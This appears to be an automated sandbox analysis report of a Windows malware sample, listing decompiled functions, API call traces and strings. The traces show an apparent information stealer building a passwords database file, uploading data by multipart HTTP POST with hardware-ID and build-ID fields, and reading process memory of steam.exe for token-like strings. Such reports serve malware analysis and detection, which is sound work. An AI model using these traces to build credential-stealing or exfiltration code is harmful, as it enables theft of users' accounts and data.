                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411D20: wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040814E
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00408158
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040815B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$FileProcesslstrcat$lstrcpy$Free$AllocCloseHandleSleeplstrlen$AllocateCopyCreateDeleteExistsPathReadSizeSystemTimewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$_passwords.db
                                                                                                                                                                                                                                                                                                  • API String ID: 3968722238-2269847733
                                                                                                                                                                                                                                                                                                  • Opcode ID: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                                                  • Instruction ID: e4e39b829918bb4bc11ac9051cc4079098e642cee815a62ce7fe490d7f0511b2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEB1AC31910709ABCB10EFB1CD99AEEB779BF58304F00551AF81267191EF78A985CBA4
                                                                                                                                                                                                                                                                                                  Function 00402AA0 Relevance: 40.7, APIs: 13, Strings: 10, Instructions: 473networkfilestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 3515 402aa0-402b51 call 410200 call 402790 call 4101c0 * 5 call 410530 InternetOpenA StrCmpCA 3532 403002-403031 InternetCloseHandle call 411250 * 2 call 410200 3515->3532 3533 402b57-402c90 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 3515->3533 3546 403034-403083 call 410230 * 9 3532->3546 3533->3532 3609 402c96-402ccf HttpOpenRequestA 3533->3609 3610 402cd5-402ce0 3609->3610 3611 402ff8-402fff InternetCloseHandle 3609->3611 3612 402ce2-402cf4 InternetSetOptionA 3610->3612 3613 402cfa-402edb call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 4101c0 call 4102e0 * 2 call 410290 call 410230 * 2 3610->3613 3611->3532 3612->3613 3716 402ee0-402f30 call 410530 lstrlenA call 410530 * 2 lstrlenA call 410530 3613->3716 3726 402f32-402f41 Sleep 3716->3726 3727 402f73-402f8e InternetReadFile 3716->3727 3728 402f50-402f6e call 4101c0 call 410230 3726->3728 3729 402f43-402f4e 3726->3729 3730 402f90-402f95 3727->3730 3731 402fe1-402fed InternetCloseHandle call 410230 3727->3731 3728->3546 3729->3716 3729->3728 3730->3731 3734 402f97-402f9a 3730->3734 3736 402ff2-402ff5 3731->3736 3737 402fa0-402fd8 call 410340 call 410290 call 410230 InternetReadFile 3734->3737 3736->3611 3737->3731 3746 402fda-402fdf 3737->3746 3746->3731 3746->3737
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00403003
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00402C85
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00402CC4
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00402CF4
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042150A,?,?,?,?,?,",?,?,build_id), ref: 00402EF9
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00402F16
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00402F39
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402F86
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402FD0
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00402FE4
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402FF9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                                  • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$hwid
                                                                                                                                                                                                                                                                                                  • API String ID: 3613725345-1912073456
                                                                                                                                                                                                                                                                                                  • Opcode ID: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 645ce5d239cc6fa04e08d723ed68e7078ac0ea7ecf833b75b29ddf73a14f7ff9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABF1543071012867CB15BBA2999A9FF776A9F84704F40005EF4066B291DFBC5EC6C7E9
                                                                                                                                                                                                                                                                                                  Function 0040FD50 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 324stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 3747 40fd50-40fd9c ??_U@YAPAXI@Z OpenProcess 3748 40fda2-40fde2 memset 3747->3748 3749 40ff2d-40ff3b 3747->3749 3751 40fe26-40fe2f call 40f9b0 3748->3751 3750 40ff3f-40ff46 3749->3750 3752 40ff48-40ff58 3750->3752 3753 40ff8c-40ff98 3750->3753 3758 40fe35-40fe4a 3751->3758 3759 40ff1b-40ff26 ??_V@YAXPAX@Z 3751->3759 3756 40ff83-40ff89 ??3@YAXPAX@Z 3752->3756 3757 40ff5a-40ff5c 3752->3757 3756->3753 3760 40ff62-40ff67 3757->3760 3761 410044-410094 _invalid_parameter_noinfo_noreturn call 411ed0 call 40fd50 ??_U@YAPAXI@Z strcpy 3757->3761 3762 40fe5c-40fe64 3758->3762 3763 40fe4c-40fe56 ReadProcessMemory 3758->3763 3759->3749 3760->3761 3764 40ff6d-40ff72 3760->3764 3779 4100c7-4100d0 3761->3779 3780 410096-4100a2 3761->3780 3766 40fe80 3762->3766 3767 40fe66-40fe6f strlen 3762->3767 3763->3762 3764->3761 3769 40ff78-40ff7b 3764->3769 3770 40fe82-40fe95 call 402400 3766->3770 3767->3770 3769->3761 3772 40ff81 3769->3772 3777 40fdf9-40fe25 memset 3770->3777 3778 40fe9b-40feaf call 40f780 3770->3778 3772->3756 3777->3751 3789 40feb1-40fec4 call 4053f0 3778->3789 3790 40feca-40fed1 3778->3790 3782 4100a4-4100a7 3780->3782 3783 4100be-4100c4 ??3@YAXPAX@Z 3780->3783 3785 4100d1-4100e7 _invalid_parameter_noinfo_noreturn 3782->3785 3786 4100a9-4100ae 3782->3786 3783->3779 3787 410163-410166 3785->3787 3788 4100e9-4100f0 3785->3788 3786->3785 3791 4100b0-4100b5 3786->3791 3794 410110-410123 3788->3794 3795 4100f2-4100ff 3788->3795 3789->3790 3806 40ff9b-40ffad 3789->3806 3790->3777 3792 40fed7-40fee7 3790->3792 3791->3785 3793 4100b7-4100ba 3791->3793 3797 40fdf0-40fdf6 ??3@YAXPAX@Z 3792->3797 3798 40feed-40feef 3792->3798 3793->3785 3799 4100bc 3793->3799 3800 410125-41012a 3794->3800 3801 410167-41019b _invalid_parameter_noinfo_noreturn atexit 3794->3801 3795->3794 3797->3777 3798->3761 3803 40fef5-40fefa 3798->3803 3799->3783 3804 410146-41015c ??3@YAXPAX@Z 3800->3804 3805 41012c-41012f 3800->3805 3803->3761 3810 40ff00-40ff05 3803->3810 3804->3787 3805->3801 3807 410131-410136 3805->3807 3808 40ffd0-40ffdf 3806->3808 3809 40ffaf-40ffbb 3806->3809 3807->3801 3811 410138-41013d 3807->3811 3812 40ffe3-410005 3808->3812 3809->3812 3813 40ffbd-40ffce memcpy 3809->3813 3810->3761 3814 40ff0b-40ff0e 3810->3814 3811->3801 3815 41013f-410142 3811->3815 3812->3750 3817 41000b-41001b 3812->3817 3813->3812 3814->3761 3816 40ff14-40ff16 3814->3816 3815->3801 3818 410144 3815->3818 3816->3797 3819 410036-41003f ??3@YAXPAX@Z 3817->3819 3820 41001d-41001f 3817->3820 3818->3804 3819->3750 3820->3761 3821 410021-410026 3820->3821 3821->3761 3822 410028-41002d 3821->3822 3822->3761 3823 41002f-410032 3822->3823 3823->3761 3824 410034 3823->3824 3824->3819
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FE01
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9B0: strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9B0: ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9B0: memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9B0: VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FF1E
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040FF84
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,0000012E,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 0040FFC4
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 00410037
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410044
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??3@memset$Processstrlen$MemoryOpenQueryReadVirtual_invalid_parameter_noinfo_noreturnmemcpystrcpy
                                                                                                                                                                                                                                                                                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73$@Gc$N0ZWFt$steam.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 2915318159-3068576885
                                                                                                                                                                                                                                                                                                  • Opcode ID: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ac8410772c06d3c7cd158b0f29ba11351ce6fbe5d6182cbcead23e9eae0fd7c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AA125B16043015BDB20AA24DD84BAFBAD5AF41304F10093FF946976C2E7BD99C8839E
                                                                                                                                                                                                                                                                                                  Function 00404EA0 Relevance: 35.4, APIs: 15, Strings: 5, Instructions: 354networkfilestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,http://localhost:,00000011), ref: 004050C1
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,http://localhost:,00000011), ref: 00405123
                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET ref: 00405152
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 00405183
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 004051AD
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 004051D3
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004051E6
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004051EF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
